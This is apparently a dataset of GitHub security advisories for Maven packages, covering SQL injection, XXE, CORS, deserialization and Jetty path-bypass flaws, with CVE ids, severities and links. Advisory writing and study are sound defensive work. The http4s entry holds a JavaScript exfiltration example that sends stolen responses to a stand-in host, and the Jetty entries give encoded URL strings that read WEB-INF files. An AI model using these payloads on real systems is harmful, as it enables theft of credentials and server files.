ecosystem
stringclasses
14 values
vuln_id
stringlengths
10
19
summary
stringlengths
4
267
details
stringlengths
9
13.5k
aliases
stringlengths
17
144
modified_date
stringdate
2010-05-27 05:47:00
2022-05-10 08:46:52
published_date
stringdate
2005-12-31 05:00:00
2022-05-10 08:46:50
severity
stringclasses
5 values
score
float64
0
10
cwe_id
stringclasses
988 values
refs
stringlengths
30
17.7k
introduced
stringlengths
75
4.26k
Maven
GHSA-xgxp-9x8p-gcw4
SQL Injection
A flaw was found in PostgreSQL versions before 13.1, before 12.5, before 11.10, before 10.15, before 9.6.20 and before 9.5.24. An attacker having permission to create non-temporary objects in at least one schema can execute arbitrary SQL functions under the identity of a superuser. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
{'CVE-2020-25695'}
2022-04-15T19:47:53.539887Z
2022-02-15T01:57:18Z
HIGH
null
{'CWE-89'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-25695', 'https://security.gentoo.org/glsa/202012-07', 'https://bugzilla.redhat.com/show_bug.cgi?id=1894425', 'https://lists.debian.org/debian-lts-announce/2020/12/msg00005.html', 'https://security.netapp.com/advisory/ntap-20201202-0003/', 'https://www.postgresql.org/support/security/'}
null
Maven
GHSA-93g4-3phc-g4xw
SQL injection in Apache DolphinScheduler
In Apache DolphinScheduler before 1.3.6 versions, authorized users can use SQL injection in the data source center. (Only applicable to MySQL data source with internal login account password)
{'CVE-2021-27644'}
2022-03-03T05:11:32.413456Z
2021-11-03T17:30:18Z
HIGH
null
{'CWE-89'}
{'https://lists.apache.org/thread.html/r35d6acf021486a390a7ea09e6650c2fe19e72522bd484791d606a6e6%40%3Cdev.dolphinscheduler.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2021/11/01/3', 'https://lists.apache.org/thread.html/r35d6acf021486a390a7ea09e6650c2fe19e72522bd484791d606a6e6@%3Cdev.dolphinscheduler.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27644'}
null
Maven
GHSA-c99r-67x4-whj6
Reflected cross-site scripting in development mode handler in Vaadin 14, 15-19
URL encoding error in development mode handler in `com.vaadin:flow-server` versions 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows local user to execute arbitrary JavaScript code by opening crafted URL in browser. - https://vaadin.com/security/cve-2021-33604
{'CVE-2021-33604'}
2022-03-03T05:12:54.251453Z
2021-06-28T16:56:07Z
LOW
null
{'CWE-172'}
{'https://vaadin.com/security/cve-2021-33604', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33604', 'https://github.com/vaadin/platform/security/advisories/GHSA-c99r-67x4-whj6', 'https://github.com/vaadin/flow/', 'https://github.com/vaadin/flow/pull/11099'}
null
Maven
GHSA-jmx8-355m-8vwh
Unauthorized client-side property update in UIDL request handler in Vaadin 10 and 11
Missing check in UIDL request handler in com.vaadin:flow-server versions 1.0.0 through 1.0.5 (Vaadin 10.0.0 through 10.0.7, and 11.0.0 through 11.0.2) allows attacker to update element property values via crafted synchronization message. - https://vaadin.com/security/cve-2018-25007
{'CVE-2018-25007'}
2022-03-03T05:14:14.615811Z
2021-04-19T14:53:09Z
LOW
null
{'CWE-754'}
{'https://github.com/vaadin/flow/security/advisories/GHSA-jmx8-355m-8vwh', 'https://nvd.nist.gov/vuln/detail/CVE-2018-25007', 'https://vaadin.com/security/cve-2018-25007', 'https://github.com/vaadin/flow/pull/4774'}
null
Maven
GHSA-qfjv-998w-q48f
High severity vulnerability that affects org.apache.syncope:syncope-core
An administrator with workflow definition entitlements can use DTD to perform malicious operations, including but not limited to file read, file write, and code execution.
{'CVE-2018-17186'}
2022-03-03T05:14:16.118208Z
2018-11-06T23:15:46Z
HIGH
null
{'CWE-611'}
{'https://github.com/advisories/GHSA-qfjv-998w-q48f', 'https://nvd.nist.gov/vuln/detail/CVE-2018-17186', 'https://syncope.apache.org/security#CVE-2018-17186:_XXE_on_BPMN_definitions'}
null
Maven
GHSA-g6v7-vqhx-6v6c
XML External Entity Reference in org.opencms:opencms-core
An XML external entity (XXE) vulnerability in Alkacon OpenCms 11.0, 11.0.1 and 11.0.2 allows remote authenticated users with edit privileges to exfiltrate files from the server's file system by uploading a crafted SVG document.
{'CVE-2021-3312'}
2022-03-03T05:12:54.278811Z
2021-10-12T17:23:40Z
MODERATE
null
{'CWE-611'}
{'https://github.com/alkacon/opencms-core', 'https://github.com/alkacon/opencms-core/issues/721', 'https://github.com/alkacon/opencms-core/issues/725', 'https://github.com/alkacon/opencms-core/releases', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3312', 'https://github.com/alkacon/opencms-core/commit/92e035423aa6967822d343e54392d4291648c0ee'}
null
Maven
GHSA-gwcr-j4wh-j3cq
Jetty Utility Servlets ConcatServlet Double Decoding Information Disclosure Vulnerability
Requests to the `ConcatServlet` and `WelcomeFilter` are able to access protected resources within the `WEB-INF` directory. For example a request to the `ConcatServlet` with a URI of `/concat?/%2557EB-INF/web.xml` can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application. This occurs because both `ConcatServlet` and `WelcomeFilter` decode the supplied path to verify it is not within the `WEB-INF` or `META-INF` directories. It then uses this decoded path to call `RequestDispatcher` which will also do decoding of the path. This double decoding allows paths with a doubly encoded `WEB-INF` to bypass this security check. ### Impact This affects all versions of `ConcatServlet` and `WelcomeFilter` in versions before 9.4.41, 10.0.3 and 11.0.3. ### Workarounds If you cannot update to the latest version of Jetty, you can instead deploy your own version of the [`ConcatServlet`](https://github.com/eclipse/jetty.project/blob/4204526d2fdad355e233f6bf18a44bfe028ee00b/jetty-servlets/src/main/java/org/eclipse/jetty/servlets/ConcatServlet.java) and/or the [`WelcomeFilter`](https://github.com/eclipse/jetty.project/blob/4204526d2fdad355e233f6bf18a44bfe028ee00b/jetty-servlets/src/main/java/org/eclipse/jetty/servlets/WelcomeFilter.java) by using the code from the latest version of Jetty.
{'CVE-2021-28169'}
2022-04-22T16:02:00.363425Z
2021-06-10T15:43:22Z
MODERATE
null
{'CWE-200'}
{'https://lists.apache.org/thread.html/r234f6452297065636356f43654cdacef565b8f9ceb0e0c07ffb8c73b@%3Cdev.kafka.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r04a4b4553a23aff26f42635a6ae388c3b162aab30a88d12e59d05168@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r33eb06b05afbc7df28d31055cae0cb3fd36cab808c884bf6d680bea5@%3Cdev.zookeeper.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2021/06/msg00017.html', 'https://lists.apache.org/thread.html/ref1c161a1621504e673f9197b49e6efe5a33ce3f0e6d8f1f804fc695@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rbefa055282d52d6b58d29a79fbb0be65ab0a38d25f00bd29eaf5e6fd@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20210727-0009/', 'https://lists.apache.org/thread.html/r284de9c5399486dfff12ab9e7323ca720dd7019a9a3e11c8510a7140@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r91e34ff61aff8fd25a3f2a21539597c6ef7589a31c199b0a9546477c@%3Cjira.kafka.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28169', 'https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread.html/rfff6ff8ffb31e8a32619c79774def44b6ffbb037c128c5ad3eab7171@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r32b0b640ad2be3b858f0af51c68a7d5c5a66a462c8bbb93699825cd3@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rd5b52362f5edf98e0dcab6541a381f571cccc05ad9188e793af688f3@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/r8a1a332899a1f92c8118b0895b144b27a78e3f25b9d58a34dd5eb084@%3Cnotifications.zookeeper.apache.org%3E', 'https://www.debian.org/security/2021/dsa-4949', 'https://lists.apache.org/thread.html/r29678972c3f8164b151fd7a5802785d402e530c09870a82ffc7681a4@%3Cdev.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rb1292d30462b9baedea7c5d9594fc75990d9aa0ec223b48054ca9c25@%3Cjira.kafka.apache.org%3E', 'https://github.com/eclipse/jetty.project'}
null
Maven
GHSA-52cf-226f-rhr6
Default CORS config allows any origin with credentials
### Impact #### Origin reflection attack The default CORS configuration is vulnerable to an origin reflection attack. Take the following http4s app `app`, using the default CORS config, running at https://vulnerable.example.com: ```scala val routes: HttpRoutes[F] = HttpRoutes.of { case req if req.pathInfo === "/secret" => Response(Ok).withEntity(password).pure[F] } val app = CORS(routes.orNotFound) ``` The following request is made to our server: ```http GET /secret HTTP/1.1 Host: vulnerable.example.com Origin: https://adversary.example.net Cookie: sessionId=... ``` When the `anyOrigin` flag of `CORSConfig` is `true`, as is the case in the default argument to `CORS`, the middleware will allow sharing its resource regardless of the `allowedOrigins` setting. Paired with the default `allowCredentials`, the server approves sharing responses that may have required credentials for sensitive information with any origin: ```http HTTP/1.1 200 OK Access-Control-Allow-Origin: https://adversary.example.org Access-Control-Allow-Credentials: true Content-Type: text/plain p4ssw0rd ``` A malicious script running on `https://adversary.example.org/` can then exfiltrate sensitive information with the user's credentials to `vulnerable.exmaple.org`: ```javascript var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://vulnerable.example.org/secret',true); req.withCredentials = true; req.send(); function reqListener() { location='//bad-people.example.org/log?key='+this.responseText; }; ``` #### Null origin attack The middleware is also susceptible to a Null Origin Attack. A user agent may send `Origin: null` when a request is made from a sandboxed iframe. The CORS-wrapped http4s app will respond with `Access-Control-Allow-Origin: null`, permitting a similar exfiltration of secrets to the above. ### Patches The problem is fixed in 0.21.27, 0.22.3, 0.23.2, and 1.0.0-M25. The original `CORS` implementation and `CORSConfig` are deprecated. In addition to the origin vulnerability, the following deficiencies in the deprecated version are fixed in the new signatures: ### Migration The `CORS` object exposes a default `CORSPolicy` via `CORS.policy`. This can be configured with various `with*` methods, like any http4s builder. Finally, the `CORSPolicy` may be applied to any `Http`, like any other http4s middleware: ```scala val routes: HttpRoutes[F] = ??? val cors = CORS.policy .withAllowOriginAll .withAllowCredentials(false) .apply(routes) ``` ### Workarounds It is possible to be safe in unpatched versions, but note the following defects exist: * The `anyMethod` flag, enabled by default, accepts methods that cannot be enumerated in the `Access-Control-Allow-Methods` preflight response. * Rejected CORS requests receive a `403` response, when the client should be the enforcement point. The server should just omit all CORS response headers. * Does not send `Vary: Access-Control-Request-Headers` on preflight requests. This may confuse caches. * Does not validate the `Access-Control-Request-Headers` of a preflight request. This validation is not mandated by the Fetch standard, but is typical of most server implementations. * Needlessly sends `Vary: Access-Control-Request-Method` on non-preflight requests. This should be harmless in practice. * Needlessly sends `Access-Control-Max-Age` header on non-preflight requests. This should be harmless in practice. * Sends an invalid `Access-Control-Allow-Credentials: false` instead of omitting the header. This should be harmless in practice. #### Explicit origins In versions before the patch, set `anyOrigin` to `false`, and then specifically include trusted origins in `allowedOrigins`. ##### 0.21.x ```scala val routes: HttpRoutes[F] = ??? val config = CORS.DefaultConfig.copy( anyOrigin = false, allowOrigins = Set("http://trusted.example.com") ) val cors = CORS(routes, config) ``` ###### 0.22.x, 0.23.x, 1.x ```scala val routes: HttpRoutes[F] = ??? val config = CORSConfig.default .withAnyOrigin(false) .withAllowedOrigins(Set("http://trusted.example.com")) val cors = CORS(routes, config) ``` #### Disable credentials Alternatively, sharing responses tainted by credentials can be deprecated. ##### 0.21.x ```scala val routes: HttpRoutes[F] = ??? val config = CORS.DefaultConfig.copy(allowCredentials = false) val cors = CORS(routes, config) ``` ##### 0.22.x, 0.23.x, 1.x ```scala val routes: HttpRoutes[F] = ??? val config = CORSConfig.default.withAllowedCredentials(false) val cors = CORS(routes, config) ``` ### References * The [MDN guide to CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) * [PayloadsAllTheThings CORS misconfiguration](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/6cba7ceda93c3f64559c3e73881c21076536e5fb/CORS%20Misconfiguration/README.md) ### For more information If you have any questions or comments about this advisory: * Open an issue in [GitHub](http://github.com/http4s/http4s) * Contact us via the [http4s security policy](https://github.com/http4s/http4s/security/policy)
{'CVE-2021-39185'}
2021-09-02T18:55:34Z
2021-09-02T16:52:18Z
CRITICAL
null
{'CWE-346'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-39185', 'https://github.com/http4s/http4s/releases/tag/v0.23.2', 'https://github.com/http4s/http4s/security/advisories/GHSA-52cf-226f-rhr6', 'https://github.com/http4s/http4s'}
null
Maven
GHSA-jwgx-9mmh-684w
Credential exposure through log files in Undertow
A vulnerability was found in Undertow web server before 2.0.21. An information exposure of plain text credentials through log files because Connectors.executeRootHandler:402 logs the HttpServerExchange object at ERROR level using UndertowLogger.REQUEST_LOGGER.undertowRequestFailed(t, exchange)
{'CVE-2019-3888'}
2022-03-03T05:13:32.343780Z
2019-06-13T20:02:56Z
CRITICAL
null
{'CWE-532'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-3888', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3888', 'https://access.redhat.com/errata/RHSA-2019:2998', 'http://www.securityfocus.com/bid/108739', 'https://access.redhat.com/errata/RHSA-2019:2439', 'https://access.redhat.com/errata/RHSA-2020:0727', 'https://security.netapp.com/advisory/ntap-20220210-0019/'}
null
Maven
GHSA-mr95-9rr4-668f
High severity vulnerability that affects com.typesafe.akka:akka-actor_2.11 and com.typesafe.akka:akka-actor_2.12
Lightbend Akka 2.5.x before 2.5.16 allows message disclosure and modification because of an RNG error. A random number generator is used in Akka Remoting for TLS (both classic and Artery Remoting). Akka allows configuration of custom random number generators. For historical reasons, Akka included the AES128CounterSecureRNG and AES256CounterSecureRNG random number generators. The implementations had a bug that caused the generated numbers to be repeated after only a few bytes. The custom RNG implementations were not configured by default but examples in the documentation showed (and therefore implicitly recommended) using the custom ones. This can be used by an attacker to compromise the communication if these random number generators are enabled in configuration. It would be possible to eavesdrop, replay, or modify the messages sent with Akka Remoting/Cluster.
{'CVE-2018-16115'}
2022-03-03T05:13:12.970210Z
2018-10-22T20:44:26Z
CRITICAL
null
{'CWE-338'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-16115', 'https://github.com/advisories/GHSA-mr95-9rr4-668f', 'https://doc.akka.io/docs/akka/current/security/2018-08-29-aes-rng.html'}
null
Maven
GHSA-rfmp-jvr7-hx78
Inadequate Encryption Strength in Apache NiFi
In Apache NiFi 1.2.0 to 1.11.4, the NiFi UI and API were protected by mandating TLS v1.2, as well as listening connections established by processors like ListenHTTP, HandleHttpRequest, etc. However intracluster communication such as cluster request replication, Site-to-Site, and load balanced queues continued to support TLS v1.0 or v1.1.
{'CVE-2020-9491'}
2022-04-29T20:33:29.094673Z
2022-01-06T20:41:06Z
HIGH
null
{'CWE-327'}
{'https://lists.apache.org/thread.html/r2d9c21f9ec35d66f2bb42f8abe876dabd786166b6284e9a33582c718@%3Ccommits.nifi.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-9491', 'https://github.com/apache/nifi', 'https://lists.apache.org/thread.html/re48582efe2ac973f8cff55c8b346825cb491c71935e15ab2d61ef3bf@%3Ccommits.nifi.apache.org%3E', 'https://nifi.apache.org/security#CVE-2020-9491', 'https://github.com/apache/nifi/commit/441781cec50f77d9f1e65093f55bbd614b8c5ec6'}
null
Maven
GHSA-5hv6-mh8q-q9v8
RCE in XWiki
### Impact Any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context which contains tools allowing to instantiate arbitrary Java objects and invoke methods that may lead to arbitrary code execution. ### Patches It has been patched in both version XWiki 12.5 and XWiki 11.10.6. ### Workarounds The only workaround is to give SCRIPT right only to trusted users. ### References https://jira.xwiki.org/browse/XWIKI-17423 It's been reported by the GitHub Security Lab under https://jira.xwiki.org/browse/XWIKI-17141. ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki](https://jira.xwiki.org) * Email us at [our security mailing list](mailto:security@xwiki.org)
{'CVE-2020-15252'}
2021-11-19T14:41:16Z
2020-10-16T16:55:49Z
HIGH
null
{'CWE-74', 'CWE-94'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-15252', 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5hv6-mh8q-q9v8', 'https://github.com/xwiki/xwiki-platform', 'https://jira.xwiki.org/browse/XWIKI-17141', 'https://jira.xwiki.org/browse/XWIKI-17423'}
null
Maven
GHSA-vgg8-72f2-qm23
Critical severity vulnerability that affects org.eclipse.jetty:jetty-server
In Eclipse Jetty, versions 9.2.x and older, 9.3.x, transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.
{'CVE-2017-7657'}
2022-03-03T05:14:14.796288Z
2018-10-19T16:15:34Z
CRITICAL
null
{'CWE-444', 'CWE-190'}
{'https://bugs.eclipse.org/bugs/show_bug.cgi?id=535668', 'https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20181014-0001/', 'https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbst03953en_us', 'https://github.com/advisories/GHSA-vgg8-72f2-qm23', 'https://nvd.nist.gov/vuln/detail/CVE-2017-7657', 'https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E', 'https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r9159c9e7ec9eac1613da2dbaddbc15691a13d4dbb2c8be974f42e6ae@%3Ccommits.druid.apache.org%3E', 'http://www.securitytracker.com/id/1041194', 'https://lists.apache.org/thread.html/r41af10c4adec8d34a969abeb07fd0d6ad0c86768b751464f1cdd23e8@%3Ccommits.druid.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2019:0910', 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://www.debian.org/security/2018/dsa-4278', 'https://lists.apache.org/thread.html/ra6f956ed4ec2855583b2d0c8b4802b450f593d37b77509b48cd5d574@%3Ccommits.druid.apache.org%3E', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html'}
null
Maven
GHSA-4w82-r329-3q67
Deserialization of Untrusted Data in jackson-databind
FasterXML jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5 and 2.9.x before 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter.
{'CVE-2020-8840'}
2022-04-07T22:46:58.349234Z
2020-03-04T20:52:14Z
CRITICAL
null
{'CWE-502'}
{'https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5@%3Cissues.zookeeper.apache.org%3E', 'http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en', 'https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20200327-0002/', 'https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89@%3Cissues.zookeeper.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8840', 'https://github.com/FasterXML/jackson-databind', 'https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8@%3Cdev.tomee.apache.org%3E', 'https://github.com/FasterXML/jackson-databind/commit/74aba4042fce35ee0b91bd2847e788c10040d78b', 'https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a@%3Cdev.ranger.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E', 'https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23@%3Ccommits.zookeeper.apache.org%3E', 'https://github.com/FasterXML/jackson-databind/issues/2620', 'https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da@%3Cnotifications.zookeeper.apache.org%3E', 'https://github.com/FasterXML/jackson-databind/commit/9bb52c7122271df75435ec7e66ecf6b02b1ee14f', 'https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71@%3Cnotifications.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21@%3Ccommits.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8@%3Cdev.ranger.apache.org%3E', 'https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882@%3Cissues.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3@%3Ccommits.druid.apache.org%3E', 'https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718@%3Cdev.ranger.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html', 'https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497', 'https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E', 'https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7@%3Cdev.zookeeper.apache.org%3E', 'https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db@%3Ccommits.druid.apache.org%3E'}
null
Maven
GHSA-f26x-pr96-vw86
Moderate severity vulnerability that affects org.springframework:spring-core
Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the "jsonp" and "callback" JSONP parameters, enabling cross-domain requests.
{'CVE-2018-11040'}
2022-03-03T05:13:34.485137Z
2018-10-16T17:43:45Z
MODERATE
null
{'CWE-829'}
{'https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html', 'https://github.com/advisories/GHSA-f26x-pr96-vw86', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://pivotal.io/security/cve-2018-11040', 'https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://nvd.nist.gov/vuln/detail/CVE-2018-11040', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html', 'https://lists.debian.org/debian-lts-announce/2021/04/msg00022.html'}
null
Maven
GHSA-v7ff-8wcx-gmc5
Authorization Before Parsing and Canonicalization in jetty
Release 9.4.37 introduced a more precise implementation of [RFC3986](https://tools.ietf.org/html/rfc3986#section-3.3) with regards to URI decoding, together with some new compliance modes to optionally allow support of some URI that may have ambiguous interpretation within the Servlet specified API methods behaviours. The default mode allowed % encoded . characters to be excluded for URI normalisation, which is correct by the RFC, but is not assumed by common Servlet implementations. The default compliance mode allows requests with URIs that contain `%2e` or `%2e%2e` segments to access protected resources within the `WEB-INF` directory. For example a request to `/context/%2e/WEB-INF/web.xml` can retrieve the `web.xml` file. This can reveal sensitive information regarding the implementation of a web application. Workarounds found by HttpCompliance mode RFC7230_NO_AMBIGUOUS_URIS can be enabled by updating `start.d/http.ini` to include: jetty.http.compliance=RFC7230_NO_AMBIGUOUS_URIS.
{'CVE-2021-28164'}
2022-04-22T16:02:00.048689Z
2021-04-06T17:31:01Z
MODERATE
null
{'CWE-863', 'CWE-551', 'CWE-200'}
